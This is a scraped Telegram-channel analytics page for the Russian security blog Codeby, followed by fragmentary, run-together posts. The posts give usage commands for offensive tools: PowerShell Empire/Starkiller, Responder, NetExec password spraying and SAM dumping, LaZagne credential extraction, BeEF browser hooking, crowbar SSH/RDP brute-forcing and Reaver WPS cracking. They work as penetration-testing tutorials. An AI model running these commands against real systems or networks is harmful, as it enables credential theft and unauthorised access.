Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
Показати більше📈 Аналітичний огляд Telegram-каналу Codeby
Канал Codeby (@codeby_sec) у мовному сегменті Російська є активним учасником. На даний момент спільнота об'єднує 36 579 підписників, посідаючи 3 750 місце в категорії Технології та додатки та 17 801 місце у регіоні Росія.
📊 Показники аудиторії та динаміка
З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 36 579 підписників.
За останніми даними від 09 червня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 199, а за останні 24 години на 2, загальне охоплення залишається високим.
- Статус верифікації: Не верифікований
- Рівень залученості (ER): Середній показник залученості аудиторії становить 7.71%. Протягом перших 24 годин після публікації контент зазвичай збирає 4.19% реакцій від загальної кількості підписників.
- Охоплення публікацій: В середньому кожен допис отримує 2 819 переглядів. Протягом першої доби публікація в середньому набирає 1 534 переглядів.
- Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 19.
- Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як edr, api, вектор, mitre, att&ck.
📝 Опис та контентна політика
Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
Завдяки високій частоті оновлень (останні дані отримано 10 червня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.
SSTImap — это специализированный инструмент, предназначенный для выявления и эксплуатации уязвимостей Server-Side Template Injection (SSTI) в веб-приложениях. SSTI является одним из серьезных видов атак, которые позволяют злоумышленникам внедрять и исполнять произвольный код на стороне сервера через уязвимые шаблонизаторы. Этот инструмент упрощает процесс анализа безопасности веб-приложений, выявляя уязвимости, связанные с обработкой шаблонов.Основные возможности SSTImap 1️⃣ Обнаружение уязвимостей SSTI SSTImap сканирует входные точки приложения, которые могут быть подвержены атаке SSTI. Это позволяет быстро определить, какие параметры или запросы являются потенциально небезопасными. 2️⃣ Поддержка популярных шаблонизаторов Утилита поддерживает работу с различными движками шаблонов, включая: ▪️ Jinja2 (Python) ▪️ Twig (PHP) ▪️ Velocity (Java) ▪️ Smarty (PHP) ▪️ Freemarker (Java) ▪️ И другие. 3️⃣ Автоматизация проверки Инструмент позволяет автоматизировать процесс проверки на наличие уязвимостей, используя заранее определенные полезные нагрузки для каждого типа движка шаблонов. 4️⃣ Эксплуатация уязвимостей SSTImap может выполнять безопасную эксплуатацию для подтверждения уязвимости. Например, он способен внедрить команды, чтобы определить, насколько опасен выявленный вектор. Установка SSTImap ➡️ Клонирование репозитория
git clone https://github.com/epinna/SSTImap.git
cd SSTImap
➡️ Установка зависимостей
pip install -r requirements.txt
➡️ Запуск утилиты
python sstimap.pygit clone https://github.com/urbanadventurer/username-anarchy
🚀 Характеристики:
⏺️Плагинная архитектура;
⏺️Подстановки при неполных данных;
⏺️Определения формата имени пользователя через строки формата;
⏺️Базы данных стран с распространенными именами и фамилиями из Familypedia и PublicProfiler, что позволяет автоматически генерировать username заданной страны.
✏️ Примеры использования:
1️⃣ Известно только имя пользователя, а формат логина нет:
./username-anarchy vasya ivanov
2️⃣ Знаем формат имени пользователя и сами имена (передаем списком в файле):
./username-anarchy --input-file ./test-names.txt --select-format first.last
Полный список поддерживаемых утилитой форматов можно узнать командой ./username-anarchy --list-formats
3️⃣ Знаем, что тестируемая организация находится в определенной стране (например, Китай). Программа автоматически сгенерирует список username характерных для заданного региона с разными форматами логинов:
./username-anarchy --country china --auto
4️⃣ Автоматическое распознавание используемого формата имени пользователя:
./username-anarchy --recognise v.ivanov
Используя флаг -F, можно определять собственный формат имени пользователя.git clone https://github.com/BC-SECURITY/Starkiller
cd Starkiller
🖥Запуск:
startkiller💡Утилита сама запустит вам браузер по адресу http://localhost:1337/index.html#/ ⏺️Нас встречает окно авторизации, входим:
login: empireadmin password: password123💡Теперь вы имеете удобный интерфейс для использования утилиты Powershell-empire, о котором мы писали ранее.
git clone https://gitlab.com/kalilinux/packages/powershell-empire
🖥Запуск:
sudo powershell-empire -h
⏺️Команда ниже, запустит сервер powershell-empire:
sudo powershell-empire server
⏺️А такой командой мы сможем подключиться к клиенту:
sudo powershell-empire client
📌Далее нам предоставляется выбор "Слушателя", который принимает от нас команды:
uselistener http⏺️Синтаксис схож с Metasploit-Framework, мы можем менять параметры:
set Name AllesGut
set Port 80
⏺️Для запуска пишем:
execute⏺️или мы можем запустить чат простой командой:
chat
sudo responder -I {NETWORK_INTERFACE*} -w On -r On -f On
Где, -I - IP-адрес для перенаправления, -w On - включаем проекси-сервер WPAD, -r On - ответы для netbios wredir, -f On - снятие отпечатков пальцев.
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
🖥Запуск:
⏺️Для проверки активных хостов и открытых портов, пишем команду:
netexec smb 127.0.0.1
⏺️Чтобы посмотреть активные сеансы:
netexec smb 127.0.0.1 -u {USERNAME} -p {PASSWORD} --sessions
⏺️NetExec также способен выполнять атаки по сбору паролей и учетных данных:
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST}
⏺️С помощью ключа -x мы можем выполнять команды:
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST} -x 'net localgroup administrators'
⏺️Создание дампа базы данных SAM
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST} --samlaZagne.exe all -oNЗапуск только определенного скрипта для браузера c целью извлечения паролей из firefox:
laZagne.exe browsers -firefox
Для расшифровки учетных данных домена можно указать пароль пользователя Windows, иначе будут перебраны уже найденные пароли Windows:
laZagne.exe all -password pass-v - увеличить уровень детализации -quiet - тихий режим без вывода информации на экран Для извлечения Wi-Fi паролей\секретов Windows необходимо запускать программу с правами администратора. В случае запуска с административными привилегиями LaZagne удаётся получить пароли для других пользователей. В Mac OS без пароля пользователя сложно восстановить пароли, хранящиеся на компьютере, поэтому рекомендуется запускать утилиту передавая её учетные данные пользователя. 💻Установить исполняемый файл можно здесь
Присоединяйтесь к Академии Кодебай – защищайте мир от угроз, находя уязвимости и предотвращая кибератаки!🚀 По всем вопросам пишите @Codeby_Academy
sudo apt install -y beef-xss
📌Запуск:
sudo beef-xss
Устанавилваем пароль для нового пользователя beef
Далее запускается демон beef и ссылка на порт на котором он запущен с web UI.
Для того чтобы "поймать браузер", используем демо страницу:
http://localhost:3000/demos/butcher/index.htmlДалее вы увидите браузер в директории "Online Browsers" в левом углу программы. Новая вкладка представляет подробности по браузеру, подцепленную страницу и подцепленный хост, а также обеспечивает новое меню из вкладок по выбранному браузеру. 📎Модули имеют 3 цвета: Зелёный - Он работает на выбраном браузере, работаем! Ораньжевый - Он будет работать, но пользователь может это выявить. Красный - На этом браузере модуль не сработает! 💡С помощью этого иструмента вы сможете: 1️⃣Осуществить сбор информации - Отпечатки браузеров, Информация, которую BeEF собирает по умолчанию с подцепленного браузера, Сбор информации о системе, Результат модуля Get System, Отпечатки пользовательского поведения 2️⃣Осуществить атаку методом социальной инженерии - Запрос учётных записей, Перенаправление на другую страницу.
sudo apt install -y feroxbuster
2️⃣
git clone https://github.com/epi052/feroxbuster
📌Запуск:
feroxbuster💡Для перебора директорий и файлов, используем такую команду:
feroxbuster --url http://localhost:80/
💡Для перебора файлов с расширениями, используем команду с таким ключём:
feroxbuster --url http://localhost:80/ -x php
💡Для фильтрации кода ответа сервера, используйте команду с таким ключём:
feroxbuster --url http://localhost:80/ --filter-status 200
💡Для очень детального анализа, используйте такой ключ:
feroxbuster --url http://localhost:80/ --extract-links
💡Чтобы отфильтровать вывод по словам, используйте такую команду:
feroxbuster --url http://localhost:80/ -W 5
Это не весь функционал этой утилиты, он намного обширнее!
https.get и https.request, для кражи данных или удалённого управления.
6️⃣ 537 пакетов с пустыми описаниями, что ещё больше скрывает их истинные намерения и повышает риск незамеченной вредоносной активности.
7️⃣ 164 пакета с необычно высокими номерами версий, которые вводят пользователей в заблуждение, заставляя их доверять устаревшему или потенциально опасному программному обеспечению.sudo apt install -y crowbar
2️⃣
git clone https://github.com/galkan/crowbar
pip3 install -r requirements.txt
➡️Запуск:
crowbar --help
🖥Для подбора пароля для SSH используем такую команду:
crowbar -b sshkey -k ~/.ssh/id_rsa -u kali -s 127.0.0.1/32
Где, -b - это то, что мы будем брутить -k - конфигурационный файл (в нашем случае id_rsa) -u - имя пользователя -s - сервер куда мы подключаемся🖥Для подбра пароля для RDP используем такую команду:
crowbar -b rdp -s 127.0.0.1/32 -u Windowz -c 12345six
Где, -c - это пароль💡Для указания файла нужно использовать заглавные буквы в ключах (-C /path/to/wordlist)
Reaver WPS Fork t6x — это инструмент для проведения атак на WPS (Wi-Fi Protected Setup), который помогает находить слабости в Wi-Fi сетях с включённой функцией WPS. Этот форк улучшает оригинальную утилиту Reaver, добавляя стабильность, производительность и новые функции.➡️ Как работает Reaver? Основной принцип работы Reaver заключается в переборе PIN-кодов WPS до нахождения правильного, что позволяет получить доступ к настройкам маршрутизатора и извлечь WPA/WPA2 пароль. 1️⃣ Идентификация цели Перед началом атаки Reaver использует утилиту wash для поиска Wi-Fi сетей с включённой функцией WPS. Вы можете получить список доступных сетей, чтобы выбрать цель для тестирования. 2️⃣ Перебор PIN-кодов Reaver последовательно отправляет PIN-коды к маршрутизатору, используя механизмы WPS. Атака разделяется на две части: • Перебор первых 4 цифр PIN-кода. • Перебор последних 3 цифр. Такой подход значительно сокращает общее количество комбинаций. 3️⃣ Обход защит Некоторые маршрутизаторы применяют защиту, блокируя WPS после нескольких попыток. Форк t6x добавляет функции, которые позволяют обходить эти механизмы: • Задержки между попытками. • Использование фальшивых MAC-адресов. • Автоматическое возобновление атаки после блокировки. 4️⃣ Извлечение WPA/WPA2 пароля После успешного подбора PIN, Reaver извлекает пароль сети, что позволяет подключиться к Wi-Fi. ➡️ Установка и настройка Reaver Утилита устанавливается из исходного кода с GitHub
sudo apt install build-essential libpcap-dev aircrack-ng git
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x/src
./configure
make
sudo make install
➡️ Пример использования wash и reaver
🔍 Сканирование сетей с помощью wash
root@kali:~# wash -i wlan0mon -c 6 -C BSSID Ch dBm WPS Lck Vendor ESSID ------------------------------------------------------ E0:3F:49:6A:57:78 6 -73 1.0 No Unknown ASUS-i - выбор интерфейса для сканирования -с - выбор канала -С - игнорирование ошибок контрольной суммы кадров 🦴 Пример использования reaver
root@kali:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from E0:3F:49:6A:57:78 [+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS) [+] Trying pin 12345670-i - выбор интерфейса -b - MAC адрес цели -v - более подробный вывод процесса работы
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
